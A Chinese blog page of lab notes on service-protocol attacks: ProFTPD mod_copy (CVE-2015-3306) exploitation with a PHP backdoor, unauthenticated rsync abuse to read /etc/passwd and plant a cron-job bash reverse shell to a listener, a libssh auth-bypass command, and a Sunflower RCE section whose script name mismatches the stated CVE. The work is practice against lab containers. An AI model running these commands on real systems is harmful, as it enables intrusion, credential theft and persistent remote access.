首页 > 其他分享 >服务攻防-应用协议cve

服务攻防-应用协议cve

时间:2024-07-21 09:28:58浏览次数:13  
标签:攻防 rsync libssh 协议 224.8 123.58 21351 src cve

Cve-2015-3306

背景:

ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。

任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdline将PHP有效负载复制到网站目录,可以实现PHP远程代码执行。

python exploit.py --host 123.58.224.8 --port 52483 --path "/var/www/html/"

123.58.224.8:52483

port从21映射到了52483

网页80端口映射到了

http://123.58.224.8:24391/backdoor.php?cmd=id

利用exp来实现任意命令执行

二.配置不当-未授权访问-Rsync 文件备份

rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配 置 ACL 或访问密码,我们将可以读写目标服务器文件。

下面是靶机的873反弹到21351端口,正常的话看默认873端口就ok

rsync rsync://123.58.224.8:21351/

读取文件:

rsync rsync://123.58.224.8:21351/src

下载文件:

rsync rsync://123.58.224.8:21351/src/etc/passwd ./

将passwd下载到当前目录

上传文件:

rsync -av passwd rsync://123.58.224.8:21351/src/tmp/passwd

将当前目录的passwd上传到目标靶机tmp目录下

rsync rsync://123.58.224.8:21351/src/tmp/passwd

读取任务计划

rsync rsync://123.58.224.8:21351/src/etc/crontab ./

创建文件

touch 1

vim 1
/bin/bash -i >& /dev/tcp/192.168.83.156/5566 0>&1

chmod +x 1

rsync -av 1 rsync://123.58.224.8:21351/src/etc/cron.hourly

rsync -av 1 rsync://123.58.224.8:21351/src/etc/cron.hourly

关闭靶场

sudo docker-compose down

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现

一、漏洞描述

libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。

二、漏洞影响

libssh 0.6 及更高版本具有身份验证绕过漏洞。

libssh 版本 0.8.4 和 libssh 0.7.6 已发布,以解决此问题

python3 libssh.py 192.168.83.136 2222 'whoami'

向日葵 CVE-2022-10270 远程代码执行漏洞

简介:向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

影响版本:

        向日葵个人版:windows <=11.0.0.33

        向日葵简约版:<= v1.0.1.43315

连接上了但是无回显

python3 cve-2022-23131.py http://20.16.77.158 Admin

标签:攻防,rsync,libssh,协议,224.8,123.58,21351,src,cve
From: https://blog.csdn.net/m0_74402888/article/details/140583522

相关文章

  • IOS七层模型对应的网络协议和物理设备
    以下是网络模型、对应的协议以及对应的物理设备的表格总结:网络模型层次主要功能对应协议对应物理设备物理层透明的传输比特流,确定机械及电气规范RS-232、V.35、RJ-45、FDDI等中继器、集线器、网线、调制解调器、网卡数据链路层将比特组装成帧和点到点的传递,物理地址寻址、......
  • https协议
    HTTPS(HypertextTransferProtocolSecure)协议是一种基于HTTP的安全通信协议,用于在计算机网络上安全地传输数据。它是在HTTP协议的基础上增加了SSL(安全套接层)或TLS(安全传输层协议)加密层,以确保数据在传输过程中的机密性、完整性和身份验证。以下是对HTTPS协议及其原理的详细......
  • DHCP协议
    DHCP----动态主机配置协议        动态主机配置协议(DynamicHostConfigurationProtocol,简称DHCP)是一种网络协议,用于自动分配IP地址给网络中的设备。DHCP可以减少人工配置IP地址的错误,避免IP地址冲突,并提高IP地址的利用率。DHCP协议工作在应用层,使用UDP协议,通常在客......
  • TCP协议
    TCP协议-----传输控制协议        一种面向连接的可靠传输协议。        TCP协议建立的连接是双向连接。面向连接:在数据传输之前,收发双方需要预先建立一条逻辑通路。无面向连接。TCP分段:因为IP分片后,TCP协议无法保证数据的......
  • Datawhale AI 夏令营:从零入门CV图像竞赛(Deepfake攻防)----Task 2
    Task2:从baseline入门深度学习原任务地址:https://datawhaler.feishu.cn/wiki/CsS2weZvgigEKok6IzycdiVunuy任务目标是:开发一个基于深度学习的Deepfake检测模型。这个实践项目将涵盖从数据集准备、模型训练到性能评估的各个环节,全面展示如何利用深度学习技术检测Deepfake内容。......
  • UART协议详解:异步串行通信的原理与应用
    UART(UniversalAsynchronousReceiver/Transmitter)协议是一种用于异步串行通信的标准,允许数据在两个设备之间通过串行总线进行双向传输。UART的设计目的是将并行数据转换为串行格式,以便通过一对导线(或无线链路)进行传输,然后再在接收端将串行数据转换回并行格式。UART的关键......
  • DHCP协议
    DHCP----动态主机配置协议    是一个局域网的网络协议,主要用于给内部网络和网络服务供应商自动分配IP地址。前身又称,BOOTP。作用:用来为终端分配IP地址,并且对IP地址进行集中化管理的协议。传输层使用UDP协议进行数据封装,端口号67/68,其中68代表客......
  • TCP协议详解
    TCP协议是一种传输控制协议,一种面向连接的可靠传输协议。TCP协议建立的链接是双向连接。双向连接:在数据传输之前,收发双方需要预先建立一条逻辑通路。无面向连接。序列号SN确认序列号AN6位标志位(URG、ACK、PSH、RST、SYN、FIN)URG---告诉对方有紧急数据......
  • D. 网络攻防
    D.网络攻防题意:一张无向图,求至多删除\(k\)条边使得图不连通的方案数。\(k\in[1,2]\)。首先考虑\(k=1\),答案即为无向图中的桥边。预计得分\(15\)分。对于\(m\le2\times10^3\)的数据,我们可以枚举一条边删除,求剩余图中的桥边数量,最后加上桥边数量即可。预计得分\(30\)......
  • Datawhale AI 夏令营——CV图像竞赛(Deepfake攻防)——Task3学习笔记
        这一篇是在数据增强的方向上发力,尝试提升模型的表现。        数据增强的目的是通过人工方式增加训练数据的多样性,从而提高模型的泛化能力,使其能够在未见过的数据上表现得更好。对于图像而言,数据增强包括例如视角、光照、遮挡等情况,使得模型能够学习到......